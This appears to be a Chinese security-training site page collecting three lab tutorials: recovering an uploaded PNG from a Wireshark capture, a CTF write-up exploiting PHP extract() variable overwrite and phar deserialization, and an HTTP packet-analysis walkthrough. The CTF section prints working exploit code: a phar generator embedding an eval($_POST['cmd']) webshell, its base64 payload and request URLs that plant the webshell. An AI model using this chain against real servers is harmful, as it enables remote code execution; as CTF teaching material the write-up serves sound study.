蚁景网安 - 网络安全人才培养服务提供商

wireshark之文件还原

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> 本文涉及相关实验：wireshark之文件还原 https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014122315591000001 实验目标：黑客A通过ARP欺骗，使用wireshark获取了整个局域网内的网络流量信息。无意之中，他发现有人在某个网站上上传了一份文件。但是他不知道怎么样通过wireshark去还原这份文件，没办法，他将监听到的数据包保存为了一份wireshark的监听记录，打算去向你请教。你能帮助他找到那份上传的文件吗？我们的任务分为3个部分： 1．对抓到的包进行显示过滤，找到关键信息。 2．对信息进行跟踪，确定上传文件的TCP流，并保存为二进制原始文件。 3．对文件中上传文件的信息进行处理，去掉多余的包头和包尾，得到原始文件。 1.1 实验任务一任务描述：使用wireshark导入监听数据包，对数据进行显示过滤，提取出来关键信息。 1. 打开catchme.pcapng，双击即可。会发现数据记录一共有148条。如果单纯的从开始到结尾去一条一条的审计，是非常费力的事情。而且实际操作过程中，148条记录，已经算是很少的了。 2. 好在wireshark为我们提供了强大的过滤显示功能。我们在filter中可以定义显示出来什么样的数据包。 3. 从题目我们可以明确，上传时访问的是个网站，因此我们需要进行协议过滤。在filter中输入http，表示我们要显示所有使用http协议的数据包。输入回车，或者点击旁边的APPLY按钮，就可以进行显示过滤。从图上下方我们可以看到，数据包由原来的148个变成了32个。这样就很容易帮我们分析了。 4. 仔细分析，我们会在末尾左右的第143条数据记录中的info中看到upload这个词，我们怀疑这条就是涉及到上传的数据包。如果你在此之前有些编写网站的经验，就会知道上传文件提交可以使用post一个表单的形式。所以，你也可以使用包过滤显示，选出所有使用post方法提交的数据包。我们可以输入http.request.method==”POST”进行包过滤。这时候的显示如下：看到了吧，这时候只显示了唯一一条记录，就是我们刚才找到的序号为143的记录，是不是快了很多啊。因此，掌握数据包过滤，是熟练掌握wireshark的必备技能之一。 1.2 实验任务二任务描述：确定POST这条数据包是否上传了文件，若存在则将数据dump出来。 1. 虽然我们看到了有upload关键字，有post方法，但是我们不能确定是不是真的就是上传文件的那个请求。我们来分析一下。双击该行。弹出协议分析框。点击+号，将子栏展开。我们可以看到，确实是上传了文件，而且文件名是bingo.png.原来他上传的是一张图片。在上方红色部分，我们可以看到由于文件比较大，TCP协议对其进行了切片，一共切了5个片。我们点击下方的各个Frame，就可以看到每个包中的内容。问题来了，能不能将这几个切片还原成一个流式会话，这样我们就能看到一个会话过程，而不是需要一个一个的去点击。 Wireshark还真可以做到。 2. 关闭这个界面，回到我们过滤后的那个POST包，右键Follow TCP Stream 这时候我们会看到：整个会话都被还原了出来。我们看到了png的原始信息。继续往下拉，我们会看到有关蓝色的显示，这是服务器给我们的回应。我们的图片信息保存在请求部分，因此可以过滤掉响应部分。因为文件肯定比响应大，所以我们选择6010那个。这时候就没有响应部分出现了。 3. 保存原始文件，以便下一步处理。我们已经知道，请求部分中包含了文件的原始信息。因此，我们可以先保存下来，然后处理一下，得到原始文件。我们选择raw类型进行保存，表示使用二进制形式保存文件。保存为任意格式的文件，这里我们保存为temp.bin 1.3 实验任务三任务描述：使用winhex对文件进行最终处理，并保存文件。 1. 将刚才保存的temp.bin用winhex打开。会看到，文中包含请求信息和我们的图片信息，以及文件结尾的尾部信息。我们需要做的事情是确定图片文件的原始信息头和尾，去掉多余部分。 2. 回到wireshark中，会看到我们刚才的tcp stream流中，关于图片的头部分在content-type: image/x-png后面有两个换行符，然后开始我们的原始文件。换行符用十六进制表示是 0D 0A.因为有两个，所以，我们在图片附近寻找0D 0A 0D 0A.后面的部分就表示图片的开始。 3. 回到winhex中，我们找到了上述数字这时候我们需要去掉图片以上的部分。在00000000偏移处点击alt+1，表示选块开始。在我们找到的0D 0A 0D 0A处的最后一个0A处点击alt+2.表示选块结束。这时候，我们就选中了图片之前的多余部分。按下delete键，选择yes。这时候文件中的多余头部已经被删除 4.回到wireshark中，我们看看图片传送完毕之后的尾部部分。我们可以看到，这次是一个换行符。后面有些文件结束标志-------------，我们同样删除它们。这时候我们的文件中就仅仅是原始图片的内容了。Ctrl+S保存。最激动人心的一步来了。将我们的temp.bin改为temp.png.打开看下：祝贺你，已经完成了我们本次实验，拿下神秘的key。这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

老赛棍寒假复习计划——反序列化篇（一）

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> 本篇主要讲解过去一年来各大比赛中出现的比较典型的几个反序列化题目本文涉及相关实验：https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182016010714511600001 （通过本次实验，大家将会明白什么是反序列化漏洞，反序列化漏洞的成因以及如何挖掘和预防此类漏洞。） xnuca个人赛题目解析复现环境：链接：https://pan.baidu.com/s/1U_uDvgtzfFV165158xGE9A 提取码：7ryd 复制这段内容后打开百度网盘手机App，操作更方便哦--来自百度网盘超级会员V3的分享寒假难得有时间把这一年的比赛题目都好好整理一下，首先来的是xnuca个人赛的一道题目，比较新颖，属于中等难度的web phar写入和反序列化题目，貌似在其之后的DASCTF也考察了类似的知识点，因为时间实在久远，加上xnuca当时的一小部分源码实在是找不到了，就借用了DASCTF的部分代码来进行讲解，解题方式是一样的。这道题目首先需要通过变量覆盖来利用file_get_contents读取template.php，然后通过template.php写入phar进行反序列化。考点一：变量覆盖首先是一个index.php <?php error_reporting(E_ALL); $sandbox = './' . md5($_SERVER['REMOTE_ADDR']); if(!is_dir($sandbox)) { mkdir($sandbox); } include_once('template.php'); $template = array('tp1'=>'tp1.tpl','tp2'=>'tp2.tpl','tp3'=>'tp3.tpl'); if(isset($_GET['var']) && is_array($_GET['var'])) { extract($_GET['var'], EXTR_OVERWRITE); } else { highlight_file(__file__); die(); } if(isset($_GET['tp'])) { $tp = $_GET['tp']; if (array_key_exists($tp, $template) === FALSE) { echo "No! You only have 3 template to reader"; die(); } $content = file_get_contents($template[$tp]); $temp = new Temp($content); } else { echo "Please choice one template to reader"; } ?> extract变量覆盖。原理是：extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名，使用数组键值作为变量值。正常的用法通常用于把数组的值转化为变量，就好像把数组一个个解压出来成为变量一样，是不是很像extract的意思： <?php $a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); echo "\$a = $a; \$b = $b; \$c = $c"; ?> 这样就会把数组$my_array里面的键值和对应键名组合成为一个变量，等同于再次赋值以前ctf考察的点基本都是如下形式的变量覆盖： extract($_GET); 关于这个地方变量覆盖的原理，就要提到一个很关键的基础知识点，$GET，$POST，$REQUEST这三个全局变量的类型是数组（不信的话自己var_dump一下），实际上我们通过get输入的变量名会成为$GET数组里的键名，输入的变量值会成为$GET里的键值，因此extract函数才会由我们的get输入接收到了$GET这个数组，从而产生了变量覆盖。本题目的写法为： extract($_GET['var'], EXTR_OVERWRITE); EXTR_OVERWRITE - 默认。如果有冲突，则覆盖已有的变量。这个地方乍一看好像是说$_GET['var']这个变量，而不是数组，但是之前也有考察过如果通过get或者post方式输入一个数组的ctf题（没错，就是绕过md5比较的php黑魔法），只要我们在get或者post输入的变量的后面加上[]，就代表我们输入的是一个数组。例如下面就代表我们输入了一个数组 http://IP?var[]=a 把$_GET变量全dump出来为： array(1) { ["var"]=> array(1) { [0]=> string(1) "a" } } 说白了，就是把$_GET这个数组变量里键名为var的这个元组的键值设置为了一个数组，这个数组是： array(1) { [0]=> string(1) "a" } 所以实际上我们还是可以通过题目中的 extract($_GET['var'], EXTR_OVERWRITE); 来进行变量覆盖。例如: http://IP/?var[template][tp1]=aaa 这样就能将已经赋值过的template变量重新赋值为一个只含有一个元组且键名为tp1的数组之前 array(3) { ["tp1"]=> string(7) "tp1.tpl" ["tp2"]=> string(7) "tp2.tpl" ["tp3"]=> string(7) "tp3.tpl" } 之后 array(1) { ["tp1"]=> string(3) "aaa" } 这里很多人有个误区：为啥不是单独覆盖template数组里的一个tp1，而是覆盖了全部呢？因为?var[template][tp1]=aaa 等同于输入了 $template=array('tp1'=>'aaa')；而不是 $template = array('tp1'=>'aaa','tp2'=>'tp2.tpl','tp3'=>'tp3.tpl'); 所以是全部覆盖我们看到第一个文件index.php里面还有一个file_get_contents，想到可以文件读取。 if(isset($_GET['tp'])) { $tp = $_GET['tp']; if (array_key_exists($tp, $template) === FALSE) { echo "No! You only have 3 template to reader"; die(); } $content = file_get_contents($template[$tp]); $temp = new Temp($content); } else { echo "Please choice one template to reader"; } 思路： $template[$tp]为我们要读取的文件名 $_GET["tp"] ——> $tp可控 array_key_exists判断$tp在$template数组中是否存在存在则读取$template[$tp]指向的文件所以我们 ?var#=文件名&tp=a 这样template数组就剩一个a，然后他的值为我们要读取的文件名，然后tp等于a，读取$template[$tp]所指向的文件，也就是$template['a']，即我们变量覆盖进去的文件名。访问得到 u can see ur html file in f187b1e39a106780507c0f5c399da8c1/594f803b380a41396ed63dca39503542.html 访问一下路径看到template.php源码，这里file_get_content读取到的并不是直接显示，而是被template.php写入到了某个地方，但是这个算是第一步的提示，直接访问就看到了template.php的源码，读完以后也会更理解整个过程。 <?php error_reporting(0); class Temp { public $suffix; public $content; public $pattern; public function __construct($content) { $this->content = $content; $this->pattern = "/{{([a-z]+)}}/"; $this->suffix = ".html"; } public function __destruct() { $this->render(); } public function render() { while (True) { if(preg_match($this->pattern, $this->content, $matches)!==1) break; global ${$matches[1]}; if(isset(${$matches[1]})) { $this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content); } else { break; } } if(strlen($this->suffix)>5) { echo "error suffix"; die(); } $filename = '/var/www/html/upload/' . md5($_SERVER['REMOTE_ADDR']) . "/" . md5($this->content) . $this->suffix; file_put_contents($filename, $this->content); echo "u can see ur html file in " . $filename; } } ?> 最关键的方法是我们的render（因为另外两个一个是构造方法用来给三个属性赋值，一个是析构方法用来触发render）他做了两件事情模板变量替换 while (True) { if(preg_match($this->pattern, $this->content, $matches)!==1) break; global ${$matches[1]}; if(isset(${$matches[1]})) { $this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content); } else { break; } } 这一步的工作用一句话概括为："用$content里匹配到的字符串的同名变量，来替换$content本身的内容" 可能乍一看看不懂，没事我们来分析：也就是说，当你输入的内容里面含有{{([a-z]+)}}的时候，他会提取{{}}里面的字符串，然后去判断他是否为一个已经声明的全局变量，如果是的话则导入到方法中，并且用这个全局变量的值去替换$content的值。例如搭建一个本地环境当你输入http://ip?content={{a}}，则返回如下结果匹配输入，含有{{([a-z]+)}}，其中$matches为 Array ( [0] => {{a}} [1] => a ) global用于将函数外部的一个全局变量导入函数内，题目中这句代码在render方法内，所以为了使用方法外的全局变量，得加一个global global ${$matches[1]}; #探测外部是否有需要名字为$matches[1]的变量，然后preg_replace将content里的$matches[1]给替换为那个变量的值实际上这是个啥呢，就是我们很常见的模板变量替换，比如说你的前端有一个{{a}}，然后你后端检测前端代码的时候，就拿后端的a变量的值替换这个{{a}}里面a所在的位置。类似flask那种模板变量替换。说白了就是，这段代码或者这道题应该是某个真实的cms上的代码阉割的，然后出成题目，并保留了当时的部分冗余代码。所以才留下了这个模板替换。(就是没啥用的意思，逃:) 写入文件 render做的第二件事情就是写入文件首先给出了一个限制： if(strlen($this->suffix)>5) { echo "error suffix"; die(); } 这段代码保证了你写入的后缀不能超过5个字符，虽然没什么用。真正写文件的的代码在这里： $filename = '/var/www/html/upload/' . md5($_SERVER['REMOTE_ADDR']) . "/" . md5($this->content) . $this->suffix; file_put_contents($filename, $this->content); echo "u can see ur html file in " . $filename; 这里思路自 PHP 5.2.0 起 data:（» RFC 2397）数据流封装器开始有效。data://text/plain;base64,加上文件内容的base64编码变量覆盖，然后file_get_content读取我们输入的data流，然后被写入 file_get_contents触发phar phar文件: <?php class Temp { public $suffix; public $content; public $pattern; } @unlink("phar.phar"); #固定老四句，除非你要修改phar文件头部，或者想压缩一个webshell，压缩的攻击通常用于lfi+phar $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); //设置stub，增加gif文件头 $phar->addFromString('test.txt','test'); //添加要压缩的文件 #实例化和修改属性的主要代码 $object = new Temp(); $object->suffix=".php"; $object->content="<?=eval(\$_POST['cmd']); "; $object->pattern="{{([a-z]+)}}"; #固定老两句 $phar->setMetadata($object); //将自定义meta-data存入manifest $phar->stopBuffering(); 读取文件内容的base64可以用如下方式：先php运行exp.php，生成phar.phar文件。 php -a 进入php交互式界面。 php > echo file_get_contents("php://filter/convert.base64-encode/resource=phar.phar"); R0lGODlhPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQqtAAAAAQAAABEAAAABAAAAAAB3AAAATzo0OiJUZW1wIjozOntzOjY6InN1ZmZpeCI7czo0OiIucGhwIjtzOjc6ImNvbnRlbnQiO3M6MjQ6Ijw/PWV2YWwoJF9QT1NUWydjbWQnXSk7ICI7czo3OiJwYXR0ZXJuIjtzOjEyOiJ7eyhbYS16XSspfX0iO30IAAAAdGVzdC50eHQEAAAAyokbYAQAAAAMfn/YpAEAAAAAAAB0ZXN0tLvtt2MIggia 然后url编码，因为=和+号在url里面不能直接用，会被当作有意义的字符第一步 http://IP/?var[template][tp1]=data://text/plain;base64,R0lGODlhPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%2BDQqtAAAAAQAAABEAAAABAAAAAAB3AAAATzo0OiJUZW1wIjozOntzOjY6InN1ZmZpeCI7czo0OiIucGhwIjtzOjc6ImNvbnRlbnQiO3M6MjQ6Ijw%2FPWV2YWwoJF9QT1NUWydjbWQnXSk7ICI7czo3OiJwYXR0ZXJuIjtzOjEyOiJ7eyhbYS16XSspfX0iO30IAAAA 回显 u can see ur html file in upload/571d8c0def6fb32d11ad1dd5a1d7e8aa/e6c3231faf7291112e65294fcf13d7fc.html 第二步通过file_get_contents触发phar http://IP/?var[template][tp1]=phar://upload/571d8c0def6fb32d11ad1dd5a1d7e8aa/e6c3231faf7291112e65294fcf13d7fc.html&tp=tp1 回显 u can see ur html file in upload/571d8c0def6fb32d11ad1dd5a1d7e8aa/d41d8cd98f00b204e9800998ecf8427e.htmlu can see ur html file in upload/571d8c0def6fb32d11ad1dd5a1d7e8aa/a3670f7aa58980d1970ac97e35a13ff1.php 第三步 http://IP/upload/571d8c0def6fb32d11ad1dd5a1d7e8aa/a3670f7aa58980d1970ac97e35a13ff1.php 就是写入的webshell 这题还可以用远程文件读取，把phar文件放在自己公网服务器上，然后让题目读取，就不用data://协议写入，因为file_get_contents没有限制不能读取外部文件 http://IP/?var[template][tp1]=http://IP/phar.phar&tp=tp1 但是xnuca他个人赛的时候没有网络，所以这个方法行不通，但是DASCTF可以用这个方法。总的来说，难度适中，主要一个是知道他这里可以任意文件读取和读取以后直接写入这个是关键，phar倒是没有什么难度，如何在没有外网的情况下通过data://流写入是关键。这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

Wireshark数据抓包分析之HTTP协议

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> 科普贴： HTTP 是一个无状态的协议。无状态是指客户端（Web 浏览器）和服务器之间不需要建立持久的链接。这意味着当一个客户端向服务器端发出请求，然后Web 服务器返回响应 ”*”(response) ，连接就被关闭了，在服务器端不保留连接的有关信息 .HTTP 遵循请求 (Request)/ 应答 (Response) 模型。客户端（Web 浏览器）向Web 服务器发送请求， Web 服务器处理请求并返回适当的应答。所有 HTTP 连接都被构造成一套请求和应答。在该过程中要经过4 个阶段，包括建立连接、发送请求信息、发送响应信息和关闭连接，如下图所示: 下面详细介绍上图中描述的HTTP 工作流程，如下客户端通过TCP 三次握手与服务器建立连接。 TCP 建立连接成功后，向服务器发送HTTP 请求。服务器接收客户端的HTTP 请求后，将返回应答，并向客户端发送数据客户端通过TCP 四次断开，与服务器断开 TCP 连接。在今天的实验中，我们将通过模拟局域网的两台机器之间的数据传输，配置好HFS软件，来抓取和分析HTTP数据。根据实验环境，本实验的步骤如下： 1．配置HFS 软件，获取 HTTP 的 GET数据和POST 数据 2．分析HTTP数据包实战步骤一配置HFS软件，获取HTTP的GET数据和POST数据在局域网环境中，我们使用一个小工具来实现HTTP 服务器。先在服务器上配置HFS 1 配置HFS软件本地解压，进入文件夹，右键以管理员身份运行。如下我们先配置HFS ，这里能达到我们的实验要求，获取到GET 和 POST 数据包即可。点击左上角的端口，输入端口，这里我们用8080 ，如下，点击确定在虚拟文件系统区域，右键，选择“从磁盘添加目录”，选择一个真实存在的目录（此处注意务必是真实存在的），弹出的选择目录类型中选择”真实目录” ，此处我们用桌面的解压缩目录，可以看到目录是红色的右键目录，点击设置”用户名及密码”，在弹出的对话框中输入用户名和密码（demo/demo ）, 点击确定。在右键目录，点击”属性”，选择”上传”sheet页，选中任何人。点击确定，这样我们就配置好了HFS 工具，可以在客户端通过浏览器访问了。 2 获取HTTP的GET数据和POST数据下面我们在测试者机器上，打开Wireshark 抓包工具，过滤条件输入ip.addr == 10.1.1.33 ，然后输入服务器中HFS给出的网址，等待服务器响应。成功之后，可以在测试者机器的浏览器上看到页面，如下：这时候，我们已经获取到了HTTP 的 GET 方法。我们将Wireshark 获取的数据包保存为 HTTP-Get。点击页面的登录，在对话框中输入用户名密码（demo/demo ），确定之后等待服务器响应。成功如下接下来，双击页面的文件夹（等待服务器响应），同时重新启动Wireshark ，等待页面刷新成功，如上图，会在左侧看到按钮，点击”上传”按钮，选择文件，这里我们选择桌面上的“http-post.txt”,点击上传。等待服务器响应。提示上传成功，如下我们保存抓包文件，名字为HTTP-Post。任务一，就到这里。实战步骤二分析HTTP数据包 1 HTTP报文格式 HTTP 由请求和响应两部分组成，所以对应的也有两种报文格式。下面分别介绍HTTP 请求报文格式和 HTTP响应报文格式。 HTTP 请求报文格式以上表格中，第1 行为“ 请求行” ，第2 、3、4 行为 “请求头部”，第5 行为空行，第6 行为“请求正文”。下面分别介绍这4 部分：（1）请求行：由3部分组成，分别为：请求方法、URL（见备注1）以及协议版本，之间由空格分隔，请求方法包括GET、POST等。协议版本的格式为：HTTP/主版本号.次版本号，常用的有HTTP/1.0和HTTP/1.1。（2）请求头部包含很多客户端环境以及请求正文的有用信息。请求头部由“关键字：值”对组成，每行一堆，关键字和值之间使用英文“：”分隔。（3）空行，这一行非常重要，必不可少。表示请求头部结束，下面就是请求正文。（4）请求正文：可选部分，比如GET 请求就没有请求正文；POST 比如以提交表单数据方式为请求正文。 HTTP 响应报文格式以上表格中，第1 行为“状态行” ，第2 、3、4 行为 “响应头部”，第5 行为空行，第6 行为“响应正文”。下面分别介绍这4 部分：（1）状态行由由3部分组成，分别为：协议版本，状态码，状态码描述，之间由空格分隔。状态代码为3位数字，200~299的状态码表示成功，300~399的状态码指资源重定向，400~499的状态码指客户端请求出错，500~599的状态码指服务端出错（HTTP/1.1向协议中引入了信息性状态码，范围为100~199）。这里列举几个常见的：状态码说明 200 响应成功 400 客户端请求有语法错误，不能被服务器识别 404 请求资源不存在 500 服务器内部错误（3）空行，这一行非常重要，必不可少。表示响应头部结束（4）响应正文，服务器返回的文档，最常见的为HTML网页。 2 HTTP的头域在HTTP的请求消息和应答消息中，都包含头域。头域分为4 种，其中请求头域和应答头域分别只在请求消息和应答消息中出现，通用头域和实体头域在两种消息中都可以出现，但实体头域只有当消息中包含了实体数据时才会出现。下面分别介绍这4 种头域中的域名城和功能。 HTTP请求头域 Header 解释 Accept 指定客户端能够接收的内容类型 Accept-Charset 浏览器可以接受的字符编码集。 Accept-Encoding 指定浏览器可以支持的web服务器返回内容压缩编码类型。 Accept-Language 浏览器可接受的语言 Accept-Ranges 可以请求网页实体的一个或者多个子范围字段 Authorization HTTP授权的授权证书 Cache-Control 指定请求和响应遵循的缓存机制 Connection 表示是否需要持久连接。（HTTP 1.1默认进行持久连接） Cookie HTTP请求发送时，会把保存在该请求域名下的所有cooki 应答头域只在应答消息中出现，是Web 服务器向浏览器提供的一些状态和要求。如下 HTTP 应答头域 Header 解释 Accept-Ranges 表明服务器是否支持指定范围请求及哪种类型的分段请求 Age 从原始服务器到代理缓存形成的估算时间（以秒计，非负） Allow 对某网络资源的有效的请求行为，不允许则返回405 Cache-Control 告诉所有的缓存机制是否可以缓存及哪种类型 Content-Encoding web服务器支持的返回内容压缩编码类型。 Content-Language 响应体的语言 Content-Length 响应体的长度 Content-Location 请求资源可替代的备用的另一地址 Content-MD5 返回资源的MD5校验值 Content-Ran 通用头域既可以用在请求消息中，也可以用在应答消息。 HTTP通用头域 Header 解释 Cache-Control Cache-Control指定请求和响应遵循的缓存机制，可以附带很多的规定值。 Connection 表示是否需要持久连接 Date 表示消息发送的时间 Pragma Pragma头域用来包含实现特定的指令，最常用的是Pragma:no-cache，用于定义页面缓存 Trailer 表示以Chunked编码传输的实体数据的尾部存在哪些头域 Transfer-Encoding WEB 服务器表明自己对本响应消息体（不是消息体里面的对象）作了怎样的编码，比如是否分块（chunked），例如：Transfer-Encoding: chunked Up 只有在请求和应答消息中包含实体数据时，才需要实体头域。请求消息中的实体数据是一些由浏览器向web服务器提交的数据，如在浏览器中采用POST方式提交表单时，浏览器就要把表单中的数据封装在请求消息的实体数据部分。应答消息中的实体数据是web服务器发给浏览器的媒体数据，如网页，图片和文档等。实体头域说明了实体数据的一些属性。如下表 HTTP实体头域 Header 解释 Allow 列出由请求URI标识的资源所支持的方法集 Content-Encoding 说明实体数据是如何编码的 Content-Language 说明实体数据所采用的自然语言 Content-Length 说明实体数据的长度 Content-Location 说明实体数据的资源位置 Content-MD5 给出实体数据的 MD5值，用于保证实体数据的完整性 Content-Range 用于指定整个实体中的一部分的插入位置，他也指示了整个实体的长度。在服务器向客户返回一个部分响应，它必须描述响应覆盖的范围和整个实体长度 Content-Type 用于向接收方指示实体的介质 3 分析GET方法的HTTP数据包我们以HTTP-Get 数据包为例，分析GET 方法的HTTP 请求和响应数据包。分析HTTP请求包我们打开数据包，输入过滤条件ip.addr == 10.1.1.33,如下前三个是TCP 的三次握手，第四个数据包则是客户端向服务器发送的HTTP 请求包，我们来学习分析下， HTTP 之前的协议，本次我们不做讲解，不懂的同学可以看之前的实验，我们来看下HTTP 协议。 Hypertext Transfer Protocol GET / HTTP/1.1\r\n # 请求行信息 Expert Info (Chat/Sequence): GET / HTTP/1.1\r\n # 专家信息 GET / HTTP/1.1\r\n Severity level: Chat Group: Sequence Request Method: GET # 请求方法为 GET Request URI: / # 请求的 URI Request Version: HTTP/1.1 # 请求的版本为HTTP/1.1 Host: 10.1.1.33:8080\r\n # 请求的主机 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\r\n # 浏览器类型 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n # 请求的类型 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\n # 请求语言 Accept-Encoding: gzip, deflate\r\n # 请求的编码格式 Connection: keep-alive\r\n # 使用持久连接 \r\n #空行 Full request URI: http://10.1.1.33:8080/ # 请求的 URI 为10.1.1.33:8080 HTTP request 1/8 Response in frame: 2770 #应答是第2770 帧 Next request in frame: 2775 # 下一个请求是第2775 帧以上就是HTTP 请求包的相关信息，可以看到客户端使用HTTP/1.1版本向服务器发送了GEY 请求，请求访问10.1.1.33 的服务器。将以上信息填入到报文格式中，如下 GET方法的HTTP请求报文格式 GET 空格 / 空格 HTTP/1.1 \r \n Accept : text/html,application/xhtml+xml,application/xml \r \n … Connection : keep-alive \r \n \r \n Full request URI: http://10.1.1.33:8080/ 分析HTTP响应包根据请求包的信息，我们已经知道，响应包是第2770 帧，下面我们来看下在HTTP 之前，我们看到了下图显示的，TCP重组片段，这些片段共有2270 个字节，由于超过了TCP 数据包的最大数据分段（MSS ），所以将数据在TCP 层进行了分段。从下面的信息，可以看到分断后的数据包及包大小，如#2767 （247 ），其中2767 表示帧号，大小为247 个字节。下面来看HTTP 的具体部分 Hypertext Transfer Protocol HTTP/1.1 200 OK\r\n # 响应行信息 Expert Info (Chat/Sequence): HTTP/1.1 200 OK\r\n #专家信息 HTTP/1.1 200 OK\r\n #HTTP 响应信息，响应码为200 Severity level: Chat Group: Sequence Request Version: HTTP/1.1 # 请求吧 Status Code: 200 # 状态码 Response Phrase: OK # 响应短语 Content-Type: text/html\r\n # 响应的内容类型 Content-Length: 2023\r\n #包的长度 Content length: 2023 Accept-Ranges: bytes\r\n #服务器支持的请求：字节 Server: HFS 2.3 beta\r\n # 服务器类型 Set-Cookie: HFS_SID=0.248448607278988; path=/; \r\n # 设置 Http Cookie Cache-Control: no-cache, no-store, must-revalidate, max-age=-1\r\n # 缓存控制 Content-Encoding: gzip\r\n # 实体数据的压缩格式 \r\n # 空行 HTTP response 1/8 #HTTP 响应 Time since request: 0.015248000 seconds # 响应使用的时间 Request in frame: 2763 # 请求的帧号为2763 Next request in frame: 2775 # 下一个请求的帧号2775 Next response in frame: 2778 #下一个响应的帧号是2778 Content-encoded entity body (gzip): 2023 bytes -> 4375 bytes #内容编码（gzip ） Line-based text data: text/html # 基于行的文本数据根据以上信息，可以知道服务器使用HTTP/1.1 200 OK 响应了客户端的请求。将信息填入到报文格式中，如下 GET方法的HTTP响应报文格式 HTTP/1.1 空格 200 空格 OK \r \n Content-Type : text/html \r \n … Content-Encoding : gzip \r \n \r \n 省略 4 分析POST方法的HTTP数据包分析HTTP请求包下面我们以HTTP-Post 为例，分析 POST 方法的 HTTP 请求和响应。打开数据包，输入过滤条件ip.addr ==10.1.1.33, 显示出的HTTP 中，Info列中还有POST 的即可，如下我们展开分析下 Hypertext Transfer Protocol #HTTP 协议 POST /hfs2_3b287/ HTTP/1.1\r\n # 请求行 Expert Info (Chat/Sequence): POST /hfs2_3b287/ HTTP/1.1\r\n #专家信息 POST /hfs2_3b287/ HTTP/1.1\r\n Severity level: Chat Group: Sequence Request Method: POST # 请求方法为 POST Request URI: /hfs2_3b287/ # 请求的URI Request Version: HTTP/1.1 #请求的版本 Host: 10.1.1.33:8080\r\n # 使用的主机 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\r\n # 使用的浏览器类型 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n # 浏览器接受的类型 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\r\n # 希望使用的语言 Accept-Encoding: gzip, deflate\r\n # 可使用的编码格式，这里是 gzip 和 deflate Referer: http://10.1.1.33:8080/hfs2_3b287/\r\nhttp://10.1.1.33:8080/hfs2_3b287/\r\n #从包含的URL 页面发起请求 Cookie: HFS_SID=0.248448607278988\r\n #Cookie信息 Cookie pair: HFS_SID=0.248448607278988 Authorization: Basic ZGVtbzpkZW1v\r\n #授权证书信息 Credentials: demo:demo # 登录的用户名密码 Connection: keep-alive\r\n # 使用持久连接 Content-Type:multipart/form-data;boundary=---------------------------54542580413055\r\n # 请求的内容类型 Content-Length: 367\r\n # 包的长度 Content length: 367 \r\n # 空行 Full request URI: http://10.1.1.33:8080/hfs2_3b287/ # 请求的 URI 为http://10.1.1.33:8080/hfs2_3b287/ HTTP request 1/6 Response in frame: 3800 # 响应的帧号 Next request in frame: 3802 # 下一个请求的正好以上就是使用POST 方法的 HTTP 请求包，可以看到请求的连接及登录的用户名密码等。将上面的信息填入到报文格式中，如下 POST方法的HTTP请求报文格式 POST 空格 /hfs2_3b287/ 空格 HTTP/1.1 \r \n Accept : text/html,application/xhtml+xml,application/xml \r \n … Content-Length : 367 \r \n \r \n 忽略另外，我们在HTTP 的下面，看到了如下的内容类型的Multipart/form-data 是上传文件的一种方式。 Multipart/form-data 其实就是浏览器用表单上传文件的方式。最常见的情境是：在写邮件时，向邮件后添加附件，附件通常使用表单添加，也就是用 multipart/form-data 格式上传到服务器。我们实验中向服务器上传了一个文件，所以就是此类型。在看Wireshark中的使用首先看wireshark 中字段与 Multipart/form-data 的对应关系： MIME Multipart Media Encapsulation ：代表整个 Multipart/form-data 上传文件中的数据。 Encapsulated multipart part ：代表表单中不同部分的数据。 Boundary ：用来隔开表单中不同部分的数据。其次， 1) MIME Multipart Media Encapsulation, Type: multipart/form-data, Boundary: "---------------------------54542580413055" 这行指出这个请求是 multipart/form-data 格式的，且 boundary 是 “----------54542580413055” 这个字符串。 2 ）关于 Boundary ： Boundary ：用来隔开表单中不同部分的数据。实际上，每部分数据的开头都是由 “--”+boundary 开始的（这是 MIME 标准中讲述的标准内容）。 3 ） Encapsulated multipart part ：紧跟着 boundary 的是该部分数据的描述： Content-Dispostion:form-data;name="Filename"\r\n 每一个 part 至少一个 name 和一个 content 部分。可以从上面的multipart/form-data中，看到我们上传的文本名字为http-post.txt，内容为“This is demo for HTTP POST”。分析HTTP响应包根据Wireshark 现实的响应包帧数，我们来看下第3800 帧。 Hypertext Transfer Protocol #HTTP 协议 HTTP/1.1 200 OK\r\n # 响应行 Expert Info (Chat/Sequence): HTTP/1.1 200 OK\r\n #专家信息 HTTP/1.1 200 OK\r\n # 响应信息 Severity level: Chat Group: Sequence Request Version: HTTP/1.1 # 请求版本 Status Code: 200 # 状态码 Response Phrase: OK #响应短语 Content-Type: text/html\r\n # # 响应包类似 Content-Length: 570\r\n # 响应包长度 Content length: 570 Accept-Ranges: bytes\r\n #服务器支持的请求：字节 Server: HFS 2.3 beta\r\n #web 服务器类型 Content-Encoding: gzip\r\n # 实体数据的压缩格式 \r\n #空行 HTTP response 1/6 # 响应 Time since request: 0.008774000 seconds # 响应请求的时间 Request in frame: 3798 #请求的帧号 Next request in frame: 3802 # 下一个请求的帧号 Next response in frame: 3804 